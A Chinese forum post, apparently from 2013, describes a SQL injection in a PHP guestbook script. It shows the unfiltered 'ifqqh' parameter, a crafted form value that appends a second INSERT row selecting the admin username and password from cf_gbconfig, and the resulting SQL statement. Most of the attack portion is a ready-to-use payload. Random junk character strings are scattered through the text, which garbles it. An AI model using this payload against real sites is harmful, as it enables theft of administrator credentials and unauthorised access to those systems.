留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。& @, f& O. \) S) L7 R7 p+ j
$ N) r8 U- m" y$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。- U4 d' ~8 G) ?% [9 {* _- a
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
! y6 U* H' w. D* f/ x2 i' ?: i8 F2 O2 a+ I* V3 e
提交的时候把ifqqh的值改一下。变成7 c8 v" W) o& v
& g+ r9 V( C% l/ v
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
/ o0 s' K! b" Q8 }
6 p/ A* E: y9 `! G$ h+ b这样SQL插入语句就变了.
/ _) Z; ?% e; K2 j1 ~8 B. K5 q5 D s) H4 l2 m1 {: ~. _
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
7 F( h0 ^. `5 s* h2 i, T8 J% y
7 V6 A2 x9 |" C5 t构造了另外一句SQL。并且把帐号密码读出来。+ z( W1 {9 B5 I
1 g( |' P5 u7 ^5 x
|
发表于 2013-2-19 08:10:11
收藏
支持
反对